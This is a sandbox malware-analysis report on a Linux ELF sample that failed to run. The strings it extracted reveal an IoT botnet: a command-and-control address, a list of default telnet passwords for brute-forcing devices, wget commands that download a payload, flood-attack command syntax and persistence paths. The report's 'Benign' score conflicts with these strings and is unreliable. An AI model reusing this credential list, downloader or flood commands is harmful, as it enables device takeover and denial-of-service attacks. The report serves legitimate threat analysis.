Analysis

Category Package Started Completed Duration
FILE elf 2019-10-09 21:21:07 2019-10-09 21:21:23 16 seconds
  • Info: Analysis failed: Unable to import package "modules.packages.elf", does not exist.
procdump = 1
2019-10-09 22:21:08,000 [root] INFO: Date set to: 10-09-19, time set to: 21:21:08, timeout set to: 200
2019-10-09 22:21:08,062 [root] DEBUG: Starting analyzer from: C:\yktra
2019-10-09 22:21:08,062 [root] DEBUG: Storing results at: C:\FUmMgi
2019-10-09 22:21:08,062 [root] DEBUG: Pipe server name: \\.\PIPE\vaGzMeGSW
2019-10-09 22:21:08,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-09 22:21:08,062 [root] INFO: Automatically selected analysis package "elf"
2019-10-09 22:21:08,062 [root] ERROR: Traceback (most recent call last):
  File "C:\yktra\analyzer.py", line 1328, in <module>
    success = analyzer.run()
  File "C:\yktra\analyzer.py", line 1045, in run
    "not exist.".format(package_name))
CuckooError: Unable to import package "modules.packages.elf", does not exist.

MalScore

0.0

Benign

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-10-09 21:21:07 2019-10-09 21:21:23

File Details

File Name 085d7d08203b2395d896b976c6003cbe
File Size 73032 bytes
File Type ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=434003046dcade88a27ae40fa0825f65a6ec861c, not stripped
MD5 085d7d08203b2395d896b976c6003cbe
SHA1 e6cd9d4a0f1efd257103568a260331f6185240d1
SHA256 5bb366e39c5ac89746537ca13d4ca2309b6852a1ac474194dcb03e1df5088950
SHA512 71862641c1713115925e7a02afb9899fa55a5ce967f3a324e46e59c03eabe14f09b06690164bdeed94a22a22ce9e8a1461d957718a1b1a06189baba05b3be4a8
CRC32 368DC782
Ssdeep 768:GzYiFQUXAp0oZEupX9CwaQEGF/J+4NdhQbh+KEBqT+asl:FiSXR9CwaRGvPNdhQbhwE
TrID
  • 50.1% (.) ELF Executable and Linkable format (Linux) (4025/14)
  • 49.8% (.O) ELF Executable and Linkable format (generic) (4000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

No signatures


Screenshots

No screenshots available.

Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
173.212.226.176:1665
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
telnet
admin
login
support
cisco
netgear
dreambox
D-Link
netman
wlseuser
ttnet
Admin
password
XA1bac0MX
public
0987654321
1234567
guest
raspberry
7ujMko0vizxv
7ujMko0admin
12345
default
administrator
1234567890
private
654321
87654321
123456789
admin1234567890
admin1234
123456
54321
1234admin
1q2w3e
ztonpk
7654321
987654321
12345678
12345Admin
56789Admin
1234Admin
tzlkisonpk
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
sername
assword
dvrdvs
nvalid
ailed
ncorrect
enied
oodbye
busybox
shell
WRECKED
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
:>%$#
%d.%d.%d.%d
gethostbyname
setsockopt
connect
0.0.0.0
TELNET LOGIN CRACKED - %s:%s:%s
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
INFECTION SUCCESS - %s:%s:%s
Telnet'd %s|%s|%s|23
FAILED TO INFECT - %s:%s:%s
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
wget -s -U "
wget -O /tmp/yuagwduiagwdhg/a -U "
PONG!
TEST %s
SPOOF
KILLSUB
KILLSUB <sub version to kill>
not killing myself cuz im not that version
TABLE
SCAN <threads> <timeout>
Starting scanner!!
GETLOCALIP
My IP: %s
GETPUBLICIP
My Public IP: %s
VERSION
Version: %d.%d
RANGE
RANGE <option 0-idk>
Range %d->%d
DOUSPOOFBRAH?
FUK YEA I DO (%s)
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>
mkdir /tmp/yuagwduiagwdhg
rm -fr /tmp/yuagwduiagwdhg
VIEWPAGE
VIEWPAGE <http ip url>
CNC <target> <port> <time>
STD <target> <port> <time>
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
GetWrecked
/etc/rc.d/rc.local
/etc/rc.conf
BUILD %s
%s 2>&1
This file is not on VirusTotal.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 0.19 seconds )

  • 0.084 TrID
  • 0.045 CAPE
  • 0.041 TargetInfo
  • 0.007 AnalysisInfo
  • 0.007 NetworkAnalysis
  • 0.005 Strings
  • 0.001 Debug

Signatures ( 0.225 seconds )

  • 0.184 antianalysis_detectfile
  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 persistence_autorun
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail

Reporting ( 0.0 seconds )

Task ID 94383
Mongo ID 5d9e4f54c3c009112d67b3d2
Cuckoo release 1.3-CAPE